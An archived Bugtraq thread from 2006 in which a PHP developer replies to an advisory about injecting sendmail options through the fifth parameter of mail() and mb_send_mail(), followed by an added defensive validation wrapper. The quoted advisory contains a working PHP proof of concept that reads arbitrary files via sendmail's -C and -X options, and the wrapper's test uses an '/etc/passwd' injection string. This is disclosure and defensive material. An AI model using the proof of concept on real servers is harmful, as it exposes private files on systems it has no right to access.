Bugtraq mailing list archives
Re: (PHP) mb_send_mail security bypass
From: Yasuo Ohgaki <yohgaki () ohgaki net>
Date: Thu, 02 Mar 2006 00:14:52 +0900
You should check mail() also... mail() has exactly the same issue, since both mail() and mb_send_mail() apply php_escape_shell_cmd() to the 5th parameter. Since the PoC is feeding usual options to the sendmail command, php_escape_shell_cmd() is useless for this kind of code.

Solution: DO NOT TRUST safe_mode and open_basedir, since they are *FAIL* safe features for script bugs. Safe_mode and open_basedir are not for the protection against PHP code writers.

By the way, php_escape_shell_cmd() is not applied to the force_extra_parameter php.ini setting. (force_extra_parameter is an INI_PERDIR|INI_SYSTEM setting.) Attackers can do much more with this feature if one would like to.

--
Yasuo Ohgaki

ced.clerget () free fr wrote:
> Vulnerable: PHP4, PHP5 with use of sendmail 8.13.4 ><
>
> When safemode is disabled and the open_basedir restriction is in effect, we
> can pass extra parameters to the sendmail command in the mail function,
> especially the -C and -X arguments.
>   -C for alternate configuration file
>   -X to log all in a file
> Can be used to view files: pass the file to view to the C argument and store
> the content in the file passed to the X argument.
>
> When safemode is enabled and the open_basedir restriction is in effect, we
> can pass extra parameters to the sendmail command in the mb_send_mail
> function.
>
> Solution: Use another sendmail command and don't allow extra parameters for
> mb_send_mail when safemode is enabled.
>
> <?php
> if (isset($_REQUEST['file'])) {
>     $file = "sendlog";
>     if (file_exists($file)) unlink($file);
>     $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
>     mb_send_mail(NULL, NULL, NULL, NULL, $extra);
>     echo "<pre>".file_get_contents($file)."</pre>";
> }
> ?>
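The practical consequence of the reply above is that php_escape_shell_cmd() strips shell metacharacters but leaves ordinary sendmail options such as -C and -X untouched, so an application must never hand caller-controlled text to the 5th parameter. The following is an added example, not code from this thread, of a wrapper (hypothetical names sendmail_extra_params and safe_send_mail) that admits only a strictly validated envelope sender and refuses everything else:

```php
<?php
// Added example, not part of the advisory or the reply above.
// "-C file -X log" contains no shell metacharacters, so escaping cannot
// help; the fifth parameter must be built from validated pieces only.

/**
 * Build the extra sendmail parameter string from a single validated
 * envelope sender. Returns null when the value must not be forwarded.
 * (hypothetical helper)
 */
function sendmail_extra_params(?string $envelope_from): ?string
{
    if ($envelope_from === null || $envelope_from === '') {
        return '';                         // no extra parameters at all
    }
    // Must parse as an e-mail address ...
    if (filter_var($envelope_from, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // ... and must not contain whitespace, quotes, backslashes or a leading
    // '-', so sendmail can only ever read it as the single argument of -f.
    if (preg_match('/^-|[\s"\'\\\\]/', $envelope_from)) {
        return null;
    }
    return '-f' . $envelope_from;
}

/**
 * Send with mail(); refuses to send rather than forward a rejected sender.
 * (hypothetical wrapper)
 */
function safe_send_mail(string $to, string $subject, string $body,
                        string $headers = '', ?string $envelope_from = null): bool
{
    $extra = sendmail_extra_params($envelope_from);
    if ($extra === null) {
        return false;
    }
    return mail($to, $subject, $body, $headers, $extra);
}

// Constructed inputs: a PoC-style option string and a plain address.
var_dump(sendmail_extra_params('-C /etc/passwd -X /tmp/sendlog'));
var_dump(sendmail_extra_params('bounces@example.com'));
```

The same helper can be used in front of mb_send_mail(), whose 5th parameter is handled identically.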